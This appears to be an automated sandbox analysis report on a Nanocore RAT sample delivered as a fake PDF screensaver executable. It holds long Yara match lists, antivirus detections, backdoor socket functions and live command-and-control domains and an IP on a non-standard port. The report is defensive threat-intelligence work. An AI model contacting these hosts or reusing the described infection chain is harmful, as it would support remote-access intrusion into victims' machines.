Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		2_2_00392163
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		2_2_00391B61

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.193.30.230	december2nd.ddns.net	Russian Federation		57844	SPD-NETTR	true

Private

IP
192.168.2.1

Contacted Domains

Name	IP	Active
december2nd.ddns.net	212.193.30.230	true
december2n.duckdns.org	212.193.30.230	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
december2nd.ddns.net	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
december2n.duckdns.org	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: december2n.duckdns.org	Avira URL Cloud: Label: malware
Source: december2nd.ddns.net	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Avira: detection malicious, Label: DR/AutoIt.Gen

Yara detected Nanocore RAT

Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Source: 026910003102350.pdf.scr.exe	ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe	Virustotal: Detection: 45%			Perma Link

Multi AV Scanner detection for domain / URL

Source: december2nd.ddns.net	Virustotal: Detection: 12%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 5%	Perma Link
Source: december2nd.ddns.net	Virustotal: Detection: 12%	Perma Link
Source: december2n.duckdns.org	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

ReversingLabs: Detection: 46%

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.RegSvcs.exe.60b0000.7.unpack	Avira: Label: TR/NanoCore.fadte
Source: 19.2.RegSvcs.exe.d00000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp

Uses 32bit PE files

Source: 026910003102350.pdf.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 026910003102350.pdf.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00CCA69B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00CDC220
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CEB348 FindFirstFileExA,	0_2_00CEB348
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0037E387
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037D836
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0038A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_0038A488
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,	2_2_003865F1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034C642 FindFirstFileExW,	2_2_0034C642
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00387248 FindFirstFileW,FindClose,	2_2_00387248
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_003872E9
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037DB69

Networking

Uses dynamic DNS services

Source: unknown	DNS query: name: december2n.duckdns.org
Source: unknown	DNS query: name: december2nd.ddns.net

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: december2n.duckdns.org
Source: Malware configuration extractor	URLs: december2nd.ddns.net

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SPD-NETTR SPD-NETTR

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230
Source: Joe Sandbox View	IP Address: 212.193.30.230 212.193.30.230

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
